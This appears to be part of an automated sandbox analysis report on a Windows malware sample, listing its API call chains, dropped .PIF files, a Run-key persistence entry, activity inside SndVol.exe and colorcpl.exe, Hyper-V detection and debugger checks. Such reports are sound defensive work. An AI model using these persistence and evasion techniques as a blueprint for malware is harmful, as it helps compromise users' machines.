              Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr

              Data Obfuscation

              Source: Yara match - File source: 0.2.jlPBMMQbXC.exe.2c50000.3.unpack, type: UNPACKEDPE
              Source: Yara match - File source: 0.2.jlPBMMQbXC.exe.23e65a8.0.unpack, type: UNPACKEDPE
              Source: alpha.pif.6.dr - Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6894C LoadLibraryW,GetProcAddress,FreeLibrary, 0_2_02C6894C
              Source: alpha.pif.6.dr - Static PE information: section name: .didat
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C7D2FC push 02C7D367h; ret 0_2_02C7D35F
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C563AE push 02C5640Bh; ret 0_2_02C56403
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C563B0 push 02C5640Bh; ret 0_2_02C56403
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C5C349 push 8B02C5C1h; ret 0_2_02C5C34E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C7C378 push 02C7C56Eh; ret 0_2_02C7C566
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C5332C push eax; ret 0_2_02C53368
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C7D0AC push 02C7D125h; ret 0_2_02C7D11D
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6306C push 02C630B9h; ret 0_2_02C630B1
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6306B push 02C630B9h; ret 0_2_02C630B1
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C7D1F8 push 02C7D288h; ret 0_2_02C7D280
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C7D144 push 02C7D1ECh; ret 0_2_02C7D1E4
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6F108 push ecx; mov dword ptr [esp], edx 0_2_02C6F10D
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C56784 push 02C567C6h; ret 0_2_02C567BE
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C56782 push 02C567C6h; ret 0_2_02C567BE
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C5D5A0 push 02C5D5CCh; ret 0_2_02C5D5C4
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C5C56C push ecx; mov dword ptr [esp], edx 0_2_02C5C571
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C7C570 push 02C7C56Eh; ret 0_2_02C7C566
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6AADF push 02C6AB18h; ret 0_2_02C6AB10
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C68AD8 push 02C68B10h; ret 0_2_02C68B08
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6AAE0 push 02C6AB18h; ret 0_2_02C6AB10
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02CC4A50 push eax; ret 0_2_02CC4B20
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C5CBEC push 02C5CD72h; ret 0_2_02C5CD6A
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6886C push 02C688AEh; ret 0_2_02C688A6
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C5C9DE push 02C5CD72h; ret 0_2_02C5CD6A
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C66946 push 02C669F3h; ret 0_2_02C669EB
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C66948 push 02C669F3h; ret 0_2_02C669EB
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6790C push 02C67989h; ret 0_2_02C67981
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C65E7C push ecx; mov dword ptr [esp], edx 0_2_02C65E7E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C62F60 push 02C62FD6h; ret 0_2_02C62FCE
              Source: C:\Windows\SysWOW64\SndVol.exe - Code function: 8_2_0447E47A push esi; ret 8_2_0447E483
              Source: C:\Windows\SysWOW64\SndVol.exe - Code function: 8_2_0442169A push eax; ret 8_2_044216F4

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\esentutl.exe - File created: C:\Users\Public\alpha.pif (reported 3 times)
              Source: C:\Windows\SysWOW64\esentutl.exe - File created: C:\Users\Public\Libraries\Selebzih.PIF (reported 2 times)
              Source: C:\Windows\SysWOW64\SndVol.exe - Code function: 8_2_29136EEB ShellExecuteW,URLDownloadToFileW, 8_2_29136EEB

              Boot Survival

              Source: C:\Windows\SysWOW64\esentutl.exe - File created: C:\Users\Public\alpha.pif
              Source: C:\Windows\SysWOW64\SndVol.exe - Code function: 8_2_2914AB9E OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle, 8_2_2914AB9E
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Selebzih (reported 2 times)

              Hooking and other Techniques for Hiding and Protection

              Source: initial sample - Icon embedded in binary file: icon matches a legit application icon: icon306.png
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe - Code function: 0_2_02C6AB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_02C6AB1C
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\SndVol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Selebzih.PIFProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2913F7E2 Sleep,ExitProcess
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0040F7E2 Sleep,ExitProcess
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077E04FF Sleep,ExitProcess
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2914A7D9 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0041A7D9 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077EB4F6 OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle
              Source: C:\Windows\SysWOW64\SndVol.exe; Window / User API: threadDelayed 1038
              Source: C:\Windows\SysWOW64\SndVol.exe; Window / User API: threadDelayed 8953
              Source: C:\Windows\SysWOW64\SndVol.exe; API coverage: 9.7 %
              Source: C:\Windows\SysWOW64\colorcpl.exe; API coverage: 3.4 %
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 7768; Thread sleep time: -3114000s >= -30000s
              Source: C:\Windows\SysWOW64\SndVol.exe TID: 7768; Thread sleep time: -26859000s >= -30000s
              Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Code function: 0_2_02C55908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_29138847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_29137877 FindFirstFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2917E8F9 FindFirstFileExA
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2913BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_29149B86 FindFirstFileW,FindNextFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2913BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2914C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2913C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2913928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_291396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_00407877 FindFirstFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0044E8F9 FindFirstFileExA
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_0781F616 FindFirstFileExA
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077D9564 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077D8594 FindFirstFileW,FindNextFileW
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077DA3BD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077ED03F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077DD0A5 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077D9FAB __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077DCA8F FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077EA8A3 FindFirstFileW
              Source: C:\Windows\SysWOW64\colorcpl.exe; Code function: 15_2_077DC888 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_29137CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW
              Source: SndVol.exe, 00000008.00000002.3861881906.00000000025DD000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000008.00000003.1574996217.00000000025DD000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
              Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
              Source: Selebzih.PIF, 0000000A.00000002.1688459414.0000000000753000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsj
              Source: Selebzih.PIF, 0000000D.00000002.1793508839.000000000066A000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; API call chain: ExitProcess graph end node (graph_0-38353)
              Source: C:\Windows\SysWOW64\SndVol.exe; API call chain: ExitProcess graph end node (graph_8-97824)
              Source: C:\Users\Public\Libraries\Selebzih.PIF; API call chain: ExitProcess graph end node
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Process information queried: ProcessInformation

              Anti Debugging

              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Code function: 0_2_02C6F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Process queried: DebugPort
              Source: C:\Users\Public\Libraries\Selebzih.PIF; Process queried: DebugPort
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_2916BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
              Source: C:\Users\user\Desktop\jlPBMMQbXC.exe; Code function: 0_2_02C6894C LoadLibraryW,GetProcAddress,FreeLibrary
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_04421120 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_04464072 mov eax, dword ptr fs:[00000030h]
              Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 8_2_29173355 mov eax, dword ptr fs:[00000030h]
